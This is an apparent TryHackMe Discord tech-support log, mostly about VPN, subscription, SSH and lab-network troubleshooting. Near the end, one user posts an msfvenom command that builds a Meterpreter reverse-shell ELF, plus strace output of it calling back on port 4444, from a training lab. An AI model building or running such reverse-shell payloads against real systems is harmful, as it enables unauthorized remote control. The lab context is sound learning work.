Having some isses with copying files from TryHackMe machine to MacOS. Currently i am stuck in the Room "Threat Intelligence Tools" Task 5 PhishTool. Here are files in .eml format provided which should be used with webbased PhishTool. Can't export these files out of the machine. Any help on that?

This is room where Cyberchef is demonstrated?

Free or Premium Attackbox?

don't know of Cyberchef. It's one of the rooms of SOC Level 1. My question is how to get a file out of virtual machine to macos for web analysis? virtual machine is without Internet connection.

premium.

found the details for attack box. Here it's about the other machine that you fire up for this task. this one has only a private IP address and is not intended to be connected to. but there are the .eml files residing that should be used to be uploaded online in PhishTool.

have you tried using a python web server and the vpn to curl or wget the files out.....

he means the machine of task, not Attacbox

yeah still high chance that python is on it

Okay so You need to have access first, you got it?

If it's a webserver you need to find URL and download from there, If it's not you need to get access from ssh or netcat

And Then you can mount files from the target machine to your machine

can't get access to this machine. can ping it but there are no shared credentials like with the attackbox

Then it should be in your task to find, Which room are you in?

Please do not tell people to download anything from the rooms, especially the malware rooms.

SOC Level 1 learning Path, Room Threat Intelligence Tools, Task 5 PhishTool

did i get the instructions wrong for this room / task?

Sorry, I didn't think of it

sorry jabba

Hey all,

Please do not tell people to download any material from the rooms on the site.
We specifically use machines that are in an isolated environment to avoid damage to your systems.

It is imperative that you use the labs provided:)
Thanks

the files are in the machine that have no internet access. attackbox would have been easy, because there i have internet access.

Well, the person in question is looking for help copying files from the room machine, not the AttackBox.

But regardless of where, we are really trying to avoid anyone from damaging their system, especially as downloading malware onto your home network might not end well:)

You can do things from Attacbox, why would you download it in your Mac?

i do not need necessarily on macos, would be happy to have them in attackbox, but there are stored in the other vm

So, finally i understood you want to access a file from target machine to your Attackbox right?

yes

So, you need an application have you downloaded it?

you sure the target machine does not have a local instance of phishtool on it already???

this is the room right: https://tryhackme.com/room/threatinteltools

Hey, marc4jc, as stated above, they are stored within the room machine on purpose do avoid you damaging your system (and so that you do not need to download any tools required).

Please ensure you are following the task closely:)

It should be somewhere in your machine

also the listed questions looks like ones you can answer by simply using a text reader on the eml file or opening it in thunderbird on the target machine

It's machine implemented task so everything you need (especially files that is needed for answers) should be in your machine

Yeah i got it now. room was all about PhishTool and setting up an account, but yeah i see just opening the mails with thunderbird is fine. sorry for confusing everybody. thanks for your great help.

no problem... also sorry again jabba

imho instructions could have been written better, at least i was confused.

yeah, i was also irritated while writing that. (Sorry again)

sorry I have never published a repository on github and I got a doubt when I saw the licenses section, the program I intend to publish is a client that uses an api to connect to a site, there shouldn't be any problems if I put an apache license even if I'm using an api that is not mine? (sorry for stupid question)

this channel is only for tryhackme tech support... you probably want to ask in #infosec-general instead...

thanks, sorry

Gave +1 Rep to @plush bay

no problem... just trying to help you get an answer as this might be drowned out otherwise

I am having some trouble. I can't connect to the network. I have a subscription but when I went to the Access tab it says not connected. I thought that I could use the web based machines when I bought the subscription. I am trying to work on Advent of Cyber.

hey i am doing the breaching ad room

and when i try to set up a dns on a web attack box running this command systemd-resolve --interface breachad --set-dns $THMDCIP --set-domain za.tryhackme.com

i get a systemd-resolve command not found...

Just got an email saying sorry to see you go, subscription is expired, but neither have I cancelled , and I've had enough funds why did I get automatically booted off platform.

If you visit your THM profile, does it say that you're subscribed or un-subscribed? 🙂

Hi everyone,

I experienced problems copying files and watching videos from the target machine.
In agent Sudo, can’t copy pictures
Advent of security 2022, can’t download the logs.
Year of the rabbit, can’t watch or copy the video.

I use OpenVPN to connect my VM Kali. Windows 10 is a host, and everything is up to date.
My Kali doesn't have an AV, firewall, etc.
Turning off the host machine security measures didn’t solve the issue.
Using the THM attack box didn’t have issues, however, this temporary solution is not compatible anymore.

I tried:
+) Using the scp -l tag to limit bandwidth
+) Using rsync
+) ethtool -K tun0 tso off gso off gro off
+) I can’t create an ssh tunnel since I don’t have permissions

The get command with FTP ends up as “stalled.”
The get command with SMB ends up with “NT_STATUS_IO_TIMEOUT listing”
Please advise.

Best day yo 🙂

Anyone knows why Complete Beginner(Path) shows up for some people, and some don't? In my class we need to do the hole room for a challenge, but some people (premium users and free) just don't have it.

I need help logging back into TryHackMe please.

Hello all,
Did any of you already cloned a room with a lab like https://tryhackme.com/room/breachingad ?
When I am cloning it I am not able to access to the network, is that normal ?
I sent an email to hello@thm.com few days ago regarding this problem, but I did not get any answer yet :/

Hi, that is normal; it isn't possible to fully clone any of the network lab rooms.

Hey, could you please send an email to support@tryhackme.com?

Sent

which latest openvpn client versions are supported by tryhackme?

Beginner question "Do you guys recommend a bare bones Ubuntu docker image to learn and build tools from scratch or kali headless?" Im on a intel mac book pro 2015 I have a kali VM but dont use it a lot because of ram issues.

i'm a beginner too. i think its nice to have a gui for tools like burp suite for example, so i would make it dual boot bare metal or create a bootable usb with kali on it

8 gig ram should be enough for a host and one vm though

that's cutting it kind of close; I wouldn't want to trust a windows host to manage 8GB smart enough to not starve even a 2GB guest

@broken bearYeah this is why I was thinking of using docker

Can anyone else not access the openVPN config file?

That's a lot to unpack there. I would recommend getting a dedicated used laptop or workstation, depending on your situation. It's a guarantee you'll break something, don't use your primary system if you are a student or use a device that has unreplaceable data on it

How can I use the student discount and also see if I'm eligible to use it

Do you have a student e-mail?

yes

Ok, that's a shame, it will never be supported by THM ?

I'm getting "sorry this token is already used by someone" when attempting to verify my Discord...

I did many commands to the bot but didn't got any response
Like notifyme, rank etc..

Yes im verified

Well don't you see the difference between your command and the command of everybody else?

No

Has anyone else had an issue with downloading a VPN config file for Networks? I've gotten the config file for machines to work (just switching servers), but can't seem to fix this issue. I just get a 404 and no downloaded config. Thanks!

Ethiopia, East Africa

heyo, trying to download the VPN config file for Wreath (I've regenerated them), except I keep catching 404's

└─# ftp 10.10.245.177 21
Connected to 10.10.245.177.
220 (vsFTPd 3.0.3)
Name (10.10.245.177:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||43078|)
ls
ls
s

sdfsdfsfsfs```

what is Entering Extended Passive Mode

this happens every time i use ftp

how to disable it

I'm having the same issue as @unique nebula. Can't download the VPN pack for Wreath, just keep getting a 404.

how can I connect to tryhackme through openvpn using tcp connection instead of udp?

You can't.

Leave the room, wait 5 mins a day rejoin

Thanks. That worked like a charm.

Gave +1 Rep to @weary spindle

Happy Hacking

Yes, was about to start the advent of christmas on a new vm and same problem, downloading the ovpn config file returns a 404

Anyone?

That would mean you have already verified your THM account with a different discord account

What happened to the other discord account ?

I'm not aware of another discord account

why is nmap so slow on Telnet Network services? Seems really slow on that nmap request today.

Hi there, just got an e-mail with the vouchers offer. If I buy it, can I offer it to someone else? It asks for an e-mail, is it supposed to use my e-mail (associated with THM) or use the email from the person who will receive the gift/voucher ? (which also has a THM account)

Hello, what is the mail address for sales/customer support? I need my personnal data on the invoice (full name, and postal address)

!email

hello there. please, let me know when to put my token so to get verified ?

*where

!docs verify

thank you @broken bear

Gave +1 Rep to @broken bear

I have done AoC every day for all 20 days of December. Yesterday, my streak was at 19 and I just completed day 20. After doing so, my streak has been reset to 0. How can I resolve this?

I had the same problem once. Refreshing the page fixed it

hi tech support. no t sure where this question fits (if its not in this channel) so please lmk, but here's my issue
when I'm in a room and finish a task (or whatever its called the content is below the long grey bar) and move on to the next task, the problem I have is when I click the down arrow on the grey bar to expand the content, the page sends me to the middle or lower end of that next content section. I then have to scroll all the way up to the beginning of that content section. Is there a way to get the (web)page to navigate to the beginning of the content when the bar is clicked on?

I hope I'm explaining this right. I wish I could show what I mean.

Hey @steel dome I think I know what you mean. Whch browser are you using?

actually the browser is probably irrelevant. This kind of scroll behaviour is quite normal on pages with accordions. Its because when one accordion is open, it will automatically get closed ( only 1 can be open at the same time ) and thus you 'lose' the height of that container and your scrolled position gets a little funky

I dont think you can really prevent this but to make it maybe slightly less annoying, you can consider to scroll up to the bar of the current open container, close that first and then open the next one. You'll still need to scroll to close the current oe, but at least when you open the next one, you'll be at the top of that 🙂

@chilly pike -- thanks for the feedback. I predominantly use firefox, but its the same experience on any browser.
I'll try your suggestion as it does seem a little less annoying. Thanks.

Gave +1 Rep to @chilly pike

new coupon

What is your question?

is there any valid voucher or coupon that still working please

hey can someone pls help me with the openVPN service? i am trying to access a machine with an ssh tryhackme@machine-ip and using the tryhackme password but keep geting permission denied.

Hi, i have a problem with my subscription, how can I contact with TryHackMe Support.

@supple lion hey i think you can mail them here help@tryhackme.com

Thanks

Gave +1 Rep to @tidal ether

Hey, are you sure that the machine can be ssh'd into? What room/task are you stuck on?

im on the OWASP Top 10 in task 29

nvm

found my problem

support@tryhackme.com is the support email, help doesn’t exist :)

Good day, I am trying to use VPN pack for wreath network, but when I download it, it is empty and I get the following error:
2022-12-21 07:38:43 Cipher negotiation is disabled since neither P2MP client nor server mode is enabled
Options error: You must define TUN/TAP device (--dev)
Use --help for more information.

Is there an official support method for incorrect streaks? I went from 19 to 0 after completing AoC day 20 in the middle of the afternoon.

A few other friends and I do it every day and they also reset. We have refreshed the page and logged in/out.

Hi all, I am having issues with the DNS in the lab 'Enumerate Active Directory'. I'm connected to the the network, I can ping the THMDC IP, I have set up the DNS server to the THMDC IP, I restarted NetworkManager but I still can't resolve thmdc.za.tryhackme.com

Do you have the lab vpn pack.

?*

What is the lab vpn pack ?

I connect with the enumad opvn file

That should be the right one.

Can you

cat \etc\resolv.conf

Or is it / ...

Generated by NetworkManager

search home
nameserver 192.168.1.1
nameserver 10.200.49.101
nameserver 1.1.1.1

10.200.49.101 is the THMDC IP in the diagram

Is the server started, yes?

Top right corner of the image in the room.

──╼ $ping 10.200.49.101
PING 10.200.49.101 (10.200.49.101) 56(84) bytes of data.
64 bytes from 10.200.49.101: icmp_seq=1 ttl=127 time=34.2 ms
64 bytes from 10.200.49.101: icmp_seq=2 ttl=127 time=34.4 ms
64 bytes from 10.200.49.101: icmp_seq=3 ttl=127 time=35.1 ms

yes, running

I have the issue since yesterday, I guess it has restarted since but nothing changed

i am doing explotiing ad room and on attack box when i want to connect to the ad i get this

Unknown interface exploitad: No such device

when you do ifconfig is exploitad the correct interface ?

┌[192.168.1.10]─[20:42:19]─[✗]─[ey@ey-parrotOS]─[~]
└──╼ $nslookup thmdc.za.tryhackme.com
Server: 10.200.49.101
Address: 10.200.49.101#53

Name: thmdc.za.tryhackme.com
Address: 10.200.49.101
** server can't find thmdc.za.tryhackme.com: NXDOMAIN

┌[192.168.1.10]─[20:42:43]─[✗]─[ey@ey-parrotOS]─[~]
└──╼ $nslookup thmdc.za.tryhackme.com
Server: 192.168.1.1
Address: 192.168.1.1#53

Somehow worked once, same command few seconds later failed

nslookup can be buggy.

When I helped test the room, nslookup wouldn't work for me, but I was connected.

whenever i try to download my openvpn configuration file for wreath, the page give me: Uh-oh, this page has been lost in the matrix. Is there something special about downloading a network config file i need to know`?

but try to have the creds here http://distributor.za.tryhackme.com/creds

Can't resolve

So can't do the lab

Leave the room and rejoin in 5 mins.

ty i will try

Gave +1 Rep to @weary spindle

wow, now i can download the config file but nothing is in it

Hey folks, can anyone check if Spring room is working as it's supposed to be? The machine shows only port 22 as open. I've restarted it a few times.

Can someone help me with openvpn ? I can not connect over udp

We only offer UDP services, if your country/ internet service provider restricts it then your only option would be to use the AttackBox

Hi- I'm using the in-browser windows machine in Chrome on Mac. How to I cut/paste into the Windows machine from the other side of my browser? Do not see the slide-out clipboard like on attackbox.

Can anyone access the attack box or Kali box for Day 21 advent of cyber?

Nothing seems to load for me

I tried terminating and accessing the box again, but no luck.

I'm a bit behind and working on Day #6 Advent task. A question - Why is it evident from the result(screen) that we are dealing with a PowerShell script, and it is using base64 Encoded string to hide the actual code?

Hey Yumi, we can see the word PowerShell written out in what seems to be a command with an "ENCOD" argument. b64 is quite easy to recognise once you've worked with it a bit; go to any b64 encoder and mess around with it, and you will quickly notice the similarities 🙂

Hi, is there any legitimate way to obtain csrf token outside of rooms? I am making QoL extension for THM, but recent update removed csrf token from HTML code, hence I should make request in room to just obtain token, which would increase traffic and would be suboptimal solution in general ||https://gitlab.com/privat33r/THM-Extender||

It's in early stages of development, so I apologize in advance for code quality, lack of refactoring and general bad practices, such as posting directly to "master" branch (at the moment it doesn't have really "stable" version, so I decided that a few commits later I will move development to "dev" brach)

Hey, it looks like a nice project 🙂 Thanks for sharing. I will ask around regarding your CSRF token question.

Gave +1 Rep to @pine spoke

Is there a means of only requesting a singular apt-get install to pull the one package specified in a parameter?

I'm needing to update the kali box vm's Wine32 install to attempt the Brainpan 1 lab, but it's attempting to pull MANY other packages as well that dont seem to be relevant, resulting in a 1.2gb pull before I can even begin

Adds a bit of overhead if I need to pause or restart the lab..

When you use apt install, those are dependencies. They're required.

Yes you can - what is your command? When updating a package however, it will also update any dependencies

;slkdjf;lksjdf

what he said

Wine being 1.2GB isn't that much.

It's a whole windows interoperability layer.

Normally i'd be fine with a oneoff dependancy install, just annoying if it's a requrement every time i need to spin up the browser vm..

Guess I'll look into setting up a local vm instead, might help save time

It’s impossible for me to change my occupation in public profile. It’s driving me crazy. Any solutions?

I have a question, & maybe this isn’t the correct chat, or even group, but I have an old laptop with an i3, & 8 ram with 500gb for hard drive. It’s currently running windows, is there a possibility to root the laptop & use a Linux OS?

Always a possibility. see if you can boot to some media (usb,cd/dvd etc) and install Linux that way.

I am fairly new to Linux, still getting used to the command line, what version of Linux would be good for a beginner? Ubuntu, X-Ubuntu, Kali, Parrot or other?

well if you're doing tryhackme stuff, Kali.

I am, also going back to college for cybersecurity… biggest change of my life. Thank you @radiant dagger

Gave +1 Rep to @radiant dagger

how do i ssh into a vm?

whats is the password?

Hi I'm developing a room and I'm trying to upload a windows server 2008 R2 image. I keep getting Problem converting vm.

Does Windows need to be activated with some type of volume license?

you can just reset it with the passwd command

The Exploiting AD network may have gotten stuck—no pingback from the hosts.

make sure the network is running first... then if it is vote for reset

yeah it's up. might take a while for votes to come in, so thought I'd post it here

well posting in #exploiting-ad and stating which subnet might get others attention to help with reseting the network

hello , does someone knows how to fix "exit code 1" on replit?

yes.... the attackbox does not really have a lot of services that could be hacked if that is what you are worrying about.... also it would be against tos to attack someone elses target machine or attackbox meaning said person has a high chance of getting banned from the platform permanently... also when you shut down the attackbox that ip gets poofed unitl another random chance makes it used again

I am doing the intro to offensive security course, and the first part has you "hacking" fakebank.com. However, after successfully doing it, I try to enter the account balance, and it says incorrect, even after refreshing the page and completely relaunching firefox. Id attach a screenshot, but it wont let me. Any ideas?

it is not asking for the balance but what is in the black box with a nice 🎉 emoji

ohhhh, I am sorry. Thank you, I apologize for my stupidity lol

no problem... a lot of people make the same mistake

Could you verify for me and then post a screenshot? @viral robin

!docs verify

yes, where do I upload it to?

@sharp bison Is the bot you'll need to DM the command to

ok

ok

let me try again

@glad oyster

i am fairly certain that is the IP address I am supposed to ssh to

at least according to the follow along video

nvm, its the ip address at the top of the screen, not in the lesson

must just be an example

For example: ssh tryhackme@MACHINE_IP . Replacing the IP address with the IP address for your Linux target machine. Once executed, we will then be asked to trust the host and then provide a password for the "tryhackme" account, which is also "tryhackme".

the tryhackme password is not working

Hi, I cannot submit any answers for any of my open AoC 2022 tasks, days 20-22. So far, I have never had problems with that. No idea what happened.

refresh the page with ctrl + F5 then try again

@plush bay am I missing something on the exercise? I am ssh to the device listed at the top of the page in green. Once connected I am prompted to enter than password "tryhackme" but it's being denied

ssh tryhackme@10.10.x.x

also do you get any errors in the tarminal

if so post a screenshot of those here please

@plush bay

Thank you! That helped. I am clearly on my way to becoming a master hacker. 😩

Gave +1 Rep to @plush bay

oh you are doing a classic mistake... hit this button:

the ip shown in the images is an example ip

you need to start your own target machine and use that ip instead

ok, I was confused, I thought that was for my machine

green start machine button == target machines
blue start attackbox button == your in browser attacking virtual machine to use to attack the target machines

sorry if you are colour blind as then this might be harder to react to

im not color blind just not reading apparently

as I tell engineers, reading is hard, I should know

wohoo, im in, thank you

@plush bay how do I give you rep points?

you do it by pining an user including ty or thanks or thank you or +rep in the message... the ping can also be through replies

+rep thank you

Gave +1 Rep to @plush bay

https://tenor.com/view/borat-borat-very-nice-verynice-thumbs-up-gif-25080066

Glad shadow could help!

Sorry for not responding, was busy

Hello would anyone be able to help me ?

best to ask your question @atomic flax 🙂

Ok, So I started to use my own VM. Yesterday morning it was working fine but i noticed that it stopped working mid-day. I read some forms and reddit and i am not able to get anywhere. its like the first part of my IP address does not match up with the machine i am trying to access. How can I fix that ?

for example my VM is 10.2.xx.xx while the machine i want to access is 10.10.xx.xx . Am i able to control this to an extent ?

I keep trying to change servers and regenerating the openvpn. Idk what else to do.

Your tun0 doesn't have to be 10.10.xxx.xxx

If you use the cli command and see connection successful or something it will work

Oh ! Ok then 🙂

Thank you

I’m using a VM to connect to the THM network to complete various series. I’m noticing that while running <NMAP> <GOBUSTER> or just browsing to the webpage for a series the connection seems to timeout briefly. I’ve checked my local network and not seeing any issues. Any thoughts on why this is happening?

Does the VPN have a pause?

I don’t recall seeing one but will take another look in case I missed it.

i'm on the task authentication bypass -> username emuration and started my attackbox. There should be running a website http://IP_AD-RE_SS/customers/signup but only getting error 405.

Error response

Error code: 405

Message: Method Not Allowed.

Error code explanation: 405 - Specified method is invalid for this resource.

Are you starting the correct machine?

i've started the attackbox.

Which room are you doing?

There might be another green start machine button on task 1.

How are you using the ovpn file? using the GUI network manager or connection from a terminal?

Hello! I am doing the Yara room in the Blue Team track... I'm connected via Ovpn, can see the machine with port 22 open, but when I attempt to connect it simply times out without providing a way for me to enter my password.

I just moved onto doing it in the browser, but is really odd.

Via the terminal

Yeah... sorry I should say when I attempt to SSH via the terminal it times out and says 'connection closed by remote host"... doing it in split screen but its still really odd

Can I have the machine IP and try myself?

10.10.76.254

Seems to work fine, can you try again to see if it's working now?

Lol yes it is working now, thank you hahaha

Gave +1 Rep to @crystal marlin

I had my VPN connected on my desktop and disabled it... does a VPN in a VM not like it when the host is connected through a separate VPN? I swear I've had that running before

Yes, this is very likely to cause issues, so don't run a VPN over another VPN 🙂

https://tenor.com/view/the-more-you-know-gif-26317296

You will have to verify first in order to embed gifs or generally images in here 😄

!docs verify

https://tenor.com/view/the-more-you-know-gif-26317296

😂 the more you know

Your other discord account was banned?

So you are evading a ban? Did you get in contact with the discord administrator to appeal?

-undelete -a

@shrewd ocean email bans@tryhackme.com for ban appeals

I'm trying to rdp into a tryhackme windows machine from my kali linux (not attackbox). I've tried rdesktop to the IP but receive error. How do I do this?

is the target listening on 3389? what command are you using, and what syntax

Yeah no, still 404'ing 3 days later

Hello, is there an admin to DM me please ?

@glacial hound hi. Excuse me, any update on my issue?

Can I DM you?

Good people tell me that after refreshing/restarting browser I should have an option to split the window and reopen my attack/kali box. Where I should find it? Can't see it anywhere

Tried other browser too, literally can't see it anywhere :/

Hi All, I had this write up in the advent of cyber room and they told me to use the attack box. I'm locked out of the attack box even though I wasn't able to use it today. I hope someone can reset my access.

Hi, All first time here. I'm looking for a little advice. I'm a semi new TryHackMe user so I lurk to learn and the subscribe button actually never works for me when I contemplate it.

Anyway so today I had one of those glitches with the site where my attack box wouldn't load and just sat their on the post loading screen. I closed the box after ten minutes and surprise the box's free hour is used up. okay not terrible I'll just use the Kali box.

Subject: advent of cyber Day 21 - MQTT

So on Kali I actually had to manually install Mosquitto. okay cool did that. I got a touch stuck setting up the subscription so I went to the video tape. I preformed the nmap cmds got ip:port and mqtt... so now I get to my actual issue/ question.

I enter the following and receive:
mosquitto_sub -h 10.10.169.14 -t device/init
Error: No route to host (edited)

Of course

Hey Everyone, new here, I have been working through Advent of cyber Day 11, but I am stuck

when I run python3 vol.py -f workstation.vnem windows.info

it says : volatility error file does not exist

Hi,
Does anyone know how to get support for subscription related issue. I am new here. I have raised issue on email support but thats 3 days now.

I am getting frustrated now.

vnem?
I think you've got a typo

thats the extension it shows in the directory

and in the instructions and walkthrough vid

ahhhh, you are absolutely correct.

vmem. not vnem. wwo

Thank you for your response James, ill be sure to triple check my characters when typing out. I cannot believe I missed that.

static-labs.tryhackme.cloud’s server IP address could not be found. shows up while using view site

Is VPN down for everyone? I can't even download my ovpn...

Looks like it's just the US-East server

West is working

It shouldn't have access to your real machine due to security, AttackBox already has everything you need in a room

For example, you wouldn't want someone to download a virus file from an attack box in the malware analysis rooms right?

Hello. How can I change my tryhackme username?

you will need to contact support through email for that

You can email tryhackme about it

!email

Shadow is fast.

is the email address

yuup shadow is fast typer

thanks : )

SSH via VPN isn't working. nmap scan showed SSH is open, http and ftp all worked.

I can't even get the simple SSH task in https://tryhackme.com/room/linuxfundamentalspart2 to work

ssh tryhackme@X.X.X.X just hangs

Found some posts online that suggested changing MTU; I tried doing that for tun0 and eth0 ( sudo ip li set mtu 1200 tun0) and no dice

Tried closing/re-opening the OpenVPN connection. Nothing

It works from a different computer so possibly something wrong with the one I'm right now.

Did you alter your ssh client? Try using telnet/Putty

Should be pretty vanilla.

Maybe it rejects fingerprints? Try to clean fingerprints cache

mv ~/.ssh/known_hosts ~/.ssh/known_hosts.old still not working

No indication from nmap that telnet is open on the target machine

Also on Kali, so probably no putty

I mean:
telnet Target 22

Well on Kali in WSL2 in Windows 11, but rather keep vpn contained there. Other working computer is Kali in WSL2 in Windows 10 so I wonder if there's a firewall difference.

Also you can try ssh -vvv flag to check more data

Interesting I got a "Connection established"

Stops with "expecting SSH2_MSG_KEX_ECDH_REPLY"

if mtu manipulations didn't help, you can try again with turned off firewall, if it works, then consider changing firewall settings. Also reboot sometimes might be a solution, especially for VM and after altering network settings.

https://github.com/microsoft/WSL/issues/4253 seems relevant. I'll spend some time there

!email

Random online comment mentioned upgrading some packages on their system fixed it for them.. Just noticed I 224 upgradeable packages. I have no idea why that would work but bombs away (and after 5 minutes it's only 10% through >.<)

Seem to have a repeating issue with NaN erros when importing json files into Bloodhound (Post-Exploitation Basics room)

...also I had to use the Attackbox rather than my Kali VM as ssh into Kali is a security risk. Should I build a new Kali VM for more risky activities and open ssh?

It seems that I can't use a hyphen in my full name on my profile? :(
A-B reverts to AB

Yeah, it mostly avoids symbols in your name.

Yes because they’re omitted on the certificate and then you have a funky name on your certificate

Hahaha imagine jabba.

Hello everyone! I wanted to know, How much time does it take for the writeup to get published in a ctf's page ?

I'm sure it's down to the author to accept or not.

Oook Thanks !

help

my bluetooth isn't showing up on windows 11

although i have bluetooth capabilities on my Intel Dual Band AC Wireless 7265

Have you updated drivers?

(Also Reminder This channel is only for TryHackMe related tech support)

ive updated drivers

@hoary comet

1. Check that the device transmits bluetooth
2. Check that bluetooth capabilities are on (search "bluetooth" in start menu)
3. Try restart
4. Reinstall drivers
5. Try from Live OS
6. At this stage it might be hardware problem, if aforementioned + google didn't help, consider using external bluetooth adapter/replacing current one

Please fix the first four badge its not working thank you. Merry Christmas ❤️

Hi,
i can't deploy machines and when i try to do it, it says that "you already have a machine running in this room terminate it first" but i don't have any machines running

This is happening to one of my friend, don't know the solution to solve it

does anyone know, about this?

There should be a machine you left in recent rooms (Not sure)

how to access that?

and what to do?

if ther is running target machine, try refresh browse. sometime it not showing IP and indicate that machine is running

The rooms are terminated when finished, but still showing error

do CTRL + F5

stil there

have refreshed it, but still the error is showing

Can you try clearing your browser cache

do you have split screan option

or try CTRL + SHIFT + F5

If you still get that error look into rooms that you've been recently If a machine is still open

For this problem I use my extension https://gitlab.com/privat33r/THM-Extender/

It adds button with which you can manage your machines

uhm does anyone know why i can't view the hints in the advent of cyber room?

@feral delta or try at least this solution: https://tryhackme.com/forum/thread/624476aaa2162c0042470cb7

Hi Team... How can share my badge on social media ?

go to you profile and in that Profile click Public Profile, that will give options

This helps... Thank You ❤️

Gave +1 Rep to @tribal burrow

I am running kali-linux on Mac M1 using UTM VM. Used the current .iso full offline installation file. Updated Kali, installed spice-vdagent and spice-webdavd and still can't share or cut and paste between host and guest. I can access the share folder at the very top of the UTM window, but not in Kali file system. Don't know what else to do. Can someone tell me if there is something else I need to do or if I forgot something? need help, so I can share files.

is it impossible to change Nickname on Certificate? can thm support help me?

After you have regened it, no

Hey guys. I want to import a VPN connection(THM connection) to the GNOME network settings:

But it displays an error msg when i try to do it

Can anyone help me with this

what error ?

are you select import from file or openVPN

Nvm, i have found the issue. Needed to install: network-manager-openvpn and network-manager-openvpn-gnome

then it worked

hello guys !

I want to report a bug in a room, can i dm an admin ?

#room-bugs would be okay for you

Don’t use the network manager, use the terminal

is not really a bug, but an answer in a room that wasn't updated

Still #room-bugs

It counts as a bug.

ok thanks guys

What is the advantage or difference in using the openVPN on GNOOME vs over my primary system since I am running a VM that shares network?

vpn is vpn. how you start it is ypu personal thing

That's what I thought. Thank you

Hi, it seems https://tryhackme.com/room/exploitingad network got an issue. I am connected to the network via OpenVPN but cannot connect to anything from the network. All seem to be unreachable.

Seems to be having an issue from attackbox as well.

Networks are different

Oh I thought It's a normal room, Sorry my bad

Hello! I am doing the MISP room currently, and it acting very strangely... Whenever I click on (seemingly) anything, It either locks out or asks for credentials again. When I provide those credentials it is giving me an error message that I have tripped the cross-site request forgery protection of MISP. Any help would be appreciated!

is this the place for subscription related questions ?

I'm going to bet that no one is going to get back to us until after the holiday 😂 Which is fine... Merry Christmas, tech support dudes!

Hi all

Having an issue in walking an application task 3

I have what appears to be the right flag but it’s not working

The question is

What is the framework flag?

@torn citrus

That isn’t the framework flag, check the includes if I can remember correctly

The includes?

Javascript includes on the homepage possibly

The framework meaning (what it was built upon)

Ok, I’ll take a look. You mean the acme IT homepage?

I would assume, I’m on mobile and guessing but from the question it seems that’ll solve your problem.

Ok, I’ll keep looking

It’s the last question I have unanswered

Thank you

Gave +1 Rep to @torn citrus

You’ll get it 🙏💪 a framework can be many things but I bet it’s in one of the JS files or even in robots.txt

Going to be something easy like that

It’s all new to me, so finding these things is exciting

No doubt 🙂 CTFs are a ton of fun, and they only get better as your skill level progresses.

If you tag a mod who is online I am sure they’ll help you

Stuck on 0.00% , uplaoding an .ova file

Hey I just noticed that I paid for a yearly subscription however in my account it says my subscription will expire in February of 2023. I think I might need to contact, the billing people or something but I thought I would ask here first.

Having issues with VPN. Downloaded VPN file for wreath and shows connected in the green back but cant access the network. already tried to reboot vm and regenerate vpn file. still no luck.

i dont want to make a background process with openvpn command every time. So I wanted a GUI made VPN connection that i click on and it will make that for me:

Its just easier to use

!email

We use UK date format

Any help ?

Ahhh yes okay that explains it

having issues with wreath. shows connected but not able to ping or perform nmap scans. had similar issues with AD labs. the only ones that work fine are the standalone machines. have the correct certificate, rebooted vm, also regenerated certificate for wreath.

a 350 mb file

taking forever

just cancel and do CTRL + F5 and then upload your file again

done that many times

it stays on 0.00% for more thn half an hour

weird, have you tried clearing browser cache?

im working inside a ubuntu vm btw

and yess

clear cache , reboot , etc

Well, I don't know sorry

thankss

can anyone help me

averytime i start up my kali even when i shut it down

i get this terminal i just cant close or something

i probs hit the wrong keybind accidently

#infosec-general

how does one remove friends?

nvm there's a UI bug

what's this about a maximum amount of friends though?

I have 13

Hi I'd like to change my username, who do I need to contact

You need to contact via email

Thanks @tribal mason

Gave +1 Rep to @tribal mason

I lost my steaks i don't know why it happens with me many times

did you try refreshing the page to check if the streak is updated or not???

Yes

hmmm

what is the country flag you get on your profile???

I already answered yesterday and when i come today i found 0

Morocco

because then daily reset is at the time of 00:00 for morocco

But it's not even 00:00 now

so if you miss to answer a question inside that time frame you could probably see the problem

¯_(ツ)_/¯

It's 11:50

best email support explaining the issue

!email

I've seen people say they refreshed and it restored it

Try Ctrl and F5.

Ok thank you

Gave +1 Rep to @plush bay

which was shadows first suggestion too as that happens a lot to shadow

I didn't but it didn't work

The VM's are slow and not even responding 😦

This is really unhelpful.

What machine?
Are you using OpenVPN?

Attackbox
I was doing warzone room

Trying to complete the Metasploit: Exploitation room but my elf file keeps throwing a Segmentation Fault

root@ip-10-10-10.10:/tmp# strace ./rev.elf 
execve("./rev.elf", ["./rev.elf"], 0x7ffc021f9ab0 /* 21 vars */) = 0
strace: [ Process PID=1548 runs in 32 bit mode. ]
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("10.x.x.x")}, 102) = 0
mprotect(0xffe43000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
read(3, "echo VDVZOtq48wWk\n", 106)     = 18
--- SIGSEGV {si_signo=SIGSEGV, si_code=SI_KERNEL, si_addr=NULL} ---
+++ killed by SIGSEGV (core dumped) +++
Segmentation fault (core dumped)

Is the fault with the machine?

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f elf > rev.elf

nvm, gave up on it and just got the hash from shadow..

i am having trouble connecting to a room via openvpn with a vm would anyone be able to help me ?

Just state what you're doing and what your error is.

You'll get help much faster.

You can DM me 🙂

Thank you 🙂 @glacial hound

Gave +1 Rep to @glacial hound

How to get 5% on my swag... because i have more than 45 days streak?

You need to contact support.

!email

ty

Gave +1 Rep to @weary spindle

i am trying to ping a room, i can with an attackbox but i cant with my vm

Have you connected to vpn properly? Can you enter in http://10.10.10.10/ ?

let me try

that is not working :/

that means you're not connected to vpn correctly, Can you show me openvpn command output?

qml@ubuntudesktop:~$ sudo openvpn Qlacus.ovpn
2022-12-26 11:04:47 DEPRECATED OPTION: --cipher set to 'AES-256-CBC' but missing in --data-ciphers (AES-256-GCM:AES-128-GCM). Future OpenVPN version will ignore --cipher for cipher negotiations. Add 'AES-256-CBC' to --data-ciphers or change --cipher 'AES-256-CBC' to --data-ciphers-fallback 'AES-256-CBC' to silence this warning.
2022-12-26 11:04:47 OpenVPN 2.5.5 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Jul 14 2022
2022-12-26 11:04:47 library versions: OpenSSL 3.0.2 15 Mar 2022, LZO 2.10
